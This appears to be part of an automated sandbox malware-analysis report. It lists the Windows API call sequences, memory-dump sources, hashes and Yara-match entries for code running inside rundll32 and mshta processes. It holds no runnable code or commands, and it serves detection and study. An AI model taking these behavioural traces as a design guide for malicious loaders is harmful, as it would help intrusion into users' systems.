                              APIs
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0593253B
                              • Sleep.KERNEL32(0000000A), ref: 05932545
                              • SetEvent.KERNEL32 ref: 0593259C
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059325BB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterEventLeaveSleep
                              • String ID:
                              • API String ID: 1925615494-0
                              • Opcode ID: 48ce848347c3f5f533435e5c28f2c16d0c0f042adb772e5dde16388553895e12
                              • Instruction ID: f64d3875d9bfa76f079f26a174432cda3a2c9f069c91ca4f6f137ab388d45759
                              • Opcode Fuzzy Hash: 48ce848347c3f5f533435e5c28f2c16d0c0f042adb772e5dde16388553895e12
                              • Instruction Fuzzy Hash: 68019270658304EBEB009BA4DC4BF6ABFADFB04712F408011F70AD6091DB749A24CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05950DDD: lstrlen.KERNEL32(?,?,00000000,05937BEE), ref: 05950DE2
                                • Part of subcall function 05950DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05950DF7
                                • Part of subcall function 05950DDD: wsprintfA.USER32 ref: 05950E13
                                • Part of subcall function 05950DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05950E2F
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 05937C06
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 05937C15
                              • CloseHandle.KERNEL32(00000000), ref: 05937C1F
                              • GetLastError.KERNEL32 ref: 05937C27
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                              • String ID:
                              • API String ID: 4042893638-0
                              • Opcode ID: 65193016ed6b4a01cdc519909969e1f27e62458c258c16cd02019650eef0d97b
                              • Instruction ID: f318bfbe41088da2e8bdc9487e6a98254c4bebbd161ef0c4200bfafeba58fa1e
                              • Opcode Fuzzy Hash: 65193016ed6b4a01cdc519909969e1f27e62458c258c16cd02019650eef0d97b
                              • Instruction Fuzzy Hash: 07F0D1B1208314BAD7216FB5EC8EF9FBE6DFF457B1F104515F90AA1190CA30565087E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedExchange.KERNEL32(0595A060,00000000), ref: 05938906
                              • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 05938921
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593894A
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0593896B
                                • Part of subcall function 0593DC41: SetEvent.KERNEL32(00000000,?,0594507B), ref: 0593DC56
                                • Part of subcall function 0593DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0594507B), ref: 0593DC76
                                • Part of subcall function 0593DC41: CloseHandle.KERNEL32(00000000,?,0594507B), ref: 0593DC7F
                                • Part of subcall function 0593DC41: CloseHandle.KERNEL32(00000000,?,?,0594507B), ref: 0593DC89
                                • Part of subcall function 0593DC41: RtlEnterCriticalSection.NTDLL(?), ref: 0593DC91
                                • Part of subcall function 0593DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 0593DCA9
                                • Part of subcall function 0593DC41: CloseHandle.KERNEL32(00000000), ref: 0593DCC5
                                • Part of subcall function 0593DC41: LocalFree.KERNEL32(?), ref: 0593DCD0
                                • Part of subcall function 0593DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 0593DCDA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                              • String ID:
                              • API String ID: 1103286547-0
                              • Opcode ID: dcf01ff048d5abbe11eddf2724ba11b429503420891d866bc7b28f01cd4ef0d1
                              • Instruction ID: a3c1ba4d71fe601d9fdc80ece7164c23a1f35020da00503e8a9c94af65621d04
                              • Opcode Fuzzy Hash: dcf01ff048d5abbe11eddf2724ba11b429503420891d866bc7b28f01cd4ef0d1
                              • Instruction Fuzzy Hash: 47F0C231769311BBDB315B31AC0FF4B7F28EB85B62F010110BA0A9B180DF649829C7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrcatW.KERNEL32(?,?), ref: 05944A5D
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0593E4AF,?,?,00001000,?,?,00001000), ref: 05944A80
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0593E4AF,?,?,00001000,?,?,00001000), ref: 05944AA2
                              • GetLastError.KERNEL32(?,0593E4AF,?,?,00001000,?,?,00001000), ref: 05944AB6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                              • String ID:
                              • API String ID: 3370347312-0
                              • Opcode ID: 7e271e93d5d0e59d56caf5a5ab4fe4b1721d25fbceef65c3e18363d697b690b3
                              • Instruction ID: ebbb2c48738e0a3d13f00fc9dabc811832d789a87c5e7640fb0f00dfc8fbc898
                              • Opcode Fuzzy Hash: 7e271e93d5d0e59d56caf5a5ab4fe4b1721d25fbceef65c3e18363d697b690b3
                              • Instruction Fuzzy Hash: A9F0AF31248304FBEF119E60AC0AF6A7F2ABF05310F100500FB0A981D0EB71A930CBA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0594D601
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0593DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594D616
                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,05933EC6,?,?), ref: 0594D623
                              • CloseHandle.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594D635
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateEvent$CloseHandlememset
                              • String ID:
                              • API String ID: 2812548120-0
                              • Opcode ID: a06957430973cb1eed7954224c63b9754b90c01b7caac2f5d13c41683afa5540
                              • Instruction ID: 224f689b8d6ab14f7e1a97c5d6e42b41f3a86c8171dddcc42611df83fad26759
                              • Opcode Fuzzy Hash: a06957430973cb1eed7954224c63b9754b90c01b7caac2f5d13c41683afa5540
                              • Instruction Fuzzy Hash: E7F0FEB510830C7FD3206F66DCC4C27FBACFF96298B12892EF14682511DA71AC158F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,05934BD6,000000FF,05F3B7F0,?,?,0594B7F2,0000003A,05F3B7F0), ref: 05944AE0
                              • GetLastError.KERNEL32(?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008), ref: 05944AEB
                              • WaitNamedPipeA.KERNEL32(00002710), ref: 05944B0D
                              • WaitForSingleObject.KERNEL32(00000000,?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C), ref: 05944B1B
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                              • String ID:
                              • API String ID: 4211439915-0
                              • Opcode ID: 5198e4fd8b295e94128e024287c6093f66ff965d84c1650e4fa00dd9531ab501
                              • Instruction ID: 7cc2c5f42e08e645004d5b928e4191177a42b6737f72e7c9983a0f371f8f9615
                              • Opcode Fuzzy Hash: 5198e4fd8b295e94128e024287c6093f66ff965d84c1650e4fa00dd9531ab501
                              • Instruction Fuzzy Hash: C5F06D32A09320ABD6201A75AC4EF5ABE2DEF00372F124622FA0DA61D0CE214C60CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,05937BEE), ref: 05950DE2
                              • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05950DF7
                              • wsprintfA.USER32 ref: 05950E13
                                • Part of subcall function 0594C01F: memset.NTDLL ref: 0594C034
                                • Part of subcall function 0594C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0594C06D
                                • Part of subcall function 0594C01F: wcstombs.NTDLL ref: 0594C077
                                • Part of subcall function 0594C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0594C0A8
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0D4
                                • Part of subcall function 0594C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0594C0EA
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0FE
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C131
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C136
                              • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05950E2F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                              • String ID:
                              • API String ID: 1624158581-0
                              • Opcode ID: d3e3ab2a4520fb20f3b9841041a0dbb976b44a6e6ae14750e0c5f13077e6a6cc
                              • Instruction ID: 32b49ea5f61f3aeb9fbf3751db434080865c9be42b7f013930dcab3d1bbd9c85
                              • Opcode Fuzzy Hash: d3e3ab2a4520fb20f3b9841041a0dbb976b44a6e6ae14750e0c5f13077e6a6cc
                              • Instruction Fuzzy Hash: AEF0B431619210BBC6205A29AC0EF6BBF6DEBC2731F160120F905D6191CF209C29CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 05936540
                              • Sleep.KERNEL32(0000000A), ref: 0593654A
                              • HeapFree.KERNEL32(00000000,?), ref: 05936572
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05936590
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 537f96e82a5e023341d342d10ff3be21eda546fccd7ace02741d29e324deb92e
                              • Instruction ID: 8e09355346eea44c6c74c354754d7b3543907af9f36af0c4767a0933682f57e5
                              • Opcode Fuzzy Hash: 537f96e82a5e023341d342d10ff3be21eda546fccd7ace02741d29e324deb92e
                              • Instruction Fuzzy Hash: D7F05E71218340EFE7109B38DC4BF1ABFA8EF00301F008524F64ADA152CB34E860CB19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 05950B35
                              • Sleep.KERNEL32(0000000A), ref: 05950B3F
                              • HeapFree.KERNEL32(00000000), ref: 05950B6D
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05950B82
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 65356abf70f228986496fdcac3bb4981c5fada98a272ee9737e93c2bd4a2d920
                              • Instruction ID: 6c561f40bdd43ccf838a58fd246daf2b80cebeb4c3677b38e77693a6a786495f
                              • Opcode Fuzzy Hash: 65356abf70f228986496fdcac3bb4981c5fada98a272ee9737e93c2bd4a2d920
                              • Instruction Fuzzy Hash: 36F0DA742683019FEB08CB24D98AF25BBA9FF04316B154108FA06CB651CB35AC70CB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0594095D
                              • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0593C1F8,00000000), ref: 059409AB
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,05951616,00000000,0593C1F8,0594E6A0,00000000,0593C1F8,059400C3,00000000,0593C1F8,0593306D,00000000), ref: 05940CB6
                              • GetLastError.KERNEL32(?,00000000,?), ref: 05940FB8
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseErrorFreeHandleHeapLastmemset
                              • String ID:
                              • API String ID: 2333114656-0
                              • Opcode ID: 619678180c31bbfb6a1b4f4b9cf795784c05d2cdddaaeb63b6cd5d907bcd4dad
                              • Instruction ID: 93512b3d0ebf9d33318a7dade08d3e634a7177915f09cdac45ba9290c2a4c457
                              • Opcode Fuzzy Hash: 619678180c31bbfb6a1b4f4b9cf795784c05d2cdddaaeb63b6cd5d907bcd4dad
                              • Instruction Fuzzy Hash: 7A519631648209FADF11EE64DC4DFAF7A6EBB95214F1404B1BF09AE080DB70AE519F52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 059463D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?), ref: 059463F5
                                • Part of subcall function 059463D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05946407
                                • Part of subcall function 059463D1: wcstombs.NTDLL ref: 05946415
                                • Part of subcall function 059463D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?), ref: 05946439
                                • Part of subcall function 059463D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0594644E
                                • Part of subcall function 059463D1: mbstowcs.NTDLL ref: 0594645B
                                • Part of subcall function 059463D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 0594646D
                                • Part of subcall function 059463D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 05946487
                              • GetLastError.KERNEL32 ref: 0593A82D
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C58
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C7C
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,059317D6,?,?,?,?,?,?,?), ref: 05943C8A
                              • HeapFree.KERNEL32(00000000,?), ref: 0593A849
                              • HeapFree.KERNEL32(00000000,?), ref: 0593A85A
                              • SetLastError.KERNEL32(00000000), ref: 0593A85D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 3867366388-0
                              • Opcode ID: 461ea02727d2b060aca2671016805785d4ec9be5ce2b61db8a682e63eddd3521
                              • Instruction ID: eb70c4a7a2491e05874ba24c9f08ca355e42def6001e754e69d9788931bfeec9
                              • Opcode Fuzzy Hash: 461ea02727d2b060aca2671016805785d4ec9be5ce2b61db8a682e63eddd3521
                              • Instruction Fuzzy Hash: 90312A36904208FFCF029FA9DC45C9EBFBAFF48320B144566F916A2121D7359A61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D6F2
                                • Part of subcall function 0594D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D710
                                • Part of subcall function 0594D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0594D73C
                                • Part of subcall function 0594D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D753
                                • Part of subcall function 0594D698: HeapFree.KERNEL32(00000000,00000000), ref: 0594D766
                                • Part of subcall function 0594D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D775
                              • GetLastError.KERNEL32 ref: 059317EE
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C58
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C7C
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,059317D6,?,?,?,?,?,?,?), ref: 05943C8A
                              • HeapFree.KERNEL32(00000000,?), ref: 0593180A
                              • HeapFree.KERNEL32(00000000,?), ref: 0593181B
                              • SetLastError.KERNEL32(00000000), ref: 0593181E
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                              • String ID:
                              • API String ID: 2451549186-0
                              • Opcode ID: 1313b4bea81882d46fefb8544ced0ec66583cddec36ac1a212812f73585a4c42
                              • Instruction ID: fc56f1f6ff189cfc9f48609013d125f5af06137074613205a0a68eb5801c3b7b
                              • Opcode Fuzzy Hash: 1313b4bea81882d46fefb8544ced0ec66583cddec36ac1a212812f73585a4c42
                              • Instruction Fuzzy Hash: 2F312936904208FFCF129FA9DC45C9EBFB9FF48320B144656F916A2121D7319A61EF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: a8a076de666ad74611c3339a5196f98b86f6a881138d9d05cf8bedaaa7d176d4
                              • Instruction ID: 1b8c6ee27817442e609b5a42985c309c90464385f2ee7b6a013584a13c43e848
                              • Opcode Fuzzy Hash: a8a076de666ad74611c3339a5196f98b86f6a881138d9d05cf8bedaaa7d176d4
                              • Instruction Fuzzy Hash: D3216FB2601909FBCB219FA0DC85E6ABB69FF09300B140559E94A96C50D732F9B1CFD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000), ref: 0593D435
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                                • Part of subcall function 05952DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0593D463,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000), ref: 05952DF1
                                • Part of subcall function 05952DE3: StrChrA.SHLWAPI(?,0000003F,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000,05933EC6,?), ref: 05952DFB
                              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?), ref: 0593D493
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4AF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: e5150ec9678baf92cd376e9c078689372cf95c921fa1edaa3033c02f2a117721
                              • Instruction ID: deb6042a2ef8a7ae164d050609e4100783ce84982ebe17f43fa69b1ecec1cac9
                              • Opcode Fuzzy Hash: e5150ec9678baf92cd376e9c078689372cf95c921fa1edaa3033c02f2a117721
                              • Instruction Fuzzy Hash: 28219072504355EBCF029F74CC9DAAE7FADAF452D0B058454F8099F242DB75EA1087E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                              • Instruction ID: 170eee47ba23dcd37ae39c14ae42726eadb83544742e32b58da1203fec466746
                              • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                              • Instruction Fuzzy Hash: 08119E72601919BBDB209FA0DC84E66B77CFF09300B06052AF94A92810D772B9B19FE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(69B25F44,?,?,00000000,05945F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 059481A4
                              • lstrlen.KERNEL32(?,?,?,?), ref: 059481A9
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 059481C5
                              • lstrcpy.KERNEL32(00000000,?), ref: 059481E3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                              • String ID:
                              • API String ID: 1697500751-0
                              • Opcode ID: 067b2d3f883470a6de08a753e40f79132110dee900e0b4616a0a4eefd124dbd5
                              • Instruction ID: 88ad86deb0d0000ec62ffe6695afacbcf550b732a5e64801741ce61ba4d95eef
                              • Opcode Fuzzy Hash: 067b2d3f883470a6de08a753e40f79132110dee900e0b4616a0a4eefd124dbd5
                              • Instruction Fuzzy Hash: E4F0F6B7508B51ABD72196699C4CF5BBF9CFFC8211F090416F90983101E731E814CBB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(05F38560,76C85520,76CC81D0,773BEEF0,0593E873,?), ref: 05938DD7
                              • lstrlen.KERNEL32(?), ref: 05938DDF
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000,05F38560), ref: 05938DF3
                              • lstrcat.KERNEL32(00000000,?), ref: 05938DFE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 9ac9d06e520be7d5627c0486c9239cc5c017c378bf78c5ab99be14f22c82e621
                              • Instruction ID: da5df2c7f1ff4853d8e1158e87d151c4ae38a8799984aa9d18922e9c72e81db1
                              • Opcode Fuzzy Hash: 9ac9d06e520be7d5627c0486c9239cc5c017c378bf78c5ab99be14f22c82e621
                              • Instruction Fuzzy Hash: 85E09273515320AB8B119BB8AC4DC9FFFACEF896253050816F604D3111CB2099148BE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000012.00000003.319380622.0000018713CA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000018713CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_3_18713ca0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                              • Instruction ID: 5606b2a02df35fa599628c0f9e4d44187078352c50f0955d2a7577aa8e4c4b7d
                              • Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                              • Instruction Fuzzy Hash: DAB0120446FBC24ED70313730C6929E3F60AB47658FD95DC78055D50D3F40C068D9322
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000012.00000003.319380622.0000018713CA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000018713CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_3_18713ca0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                              • Instruction ID: 456640eb2d22197f2727c170d30a36af38ae97571cfec4d7acc93335dad8311d
                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                              • Instruction Fuzzy Hash: B490021449941655D41415910C4929D60406388694FE488804426A05C4E84D43965252
                              Uniqueness

                              Uniqueness Score: -1.00%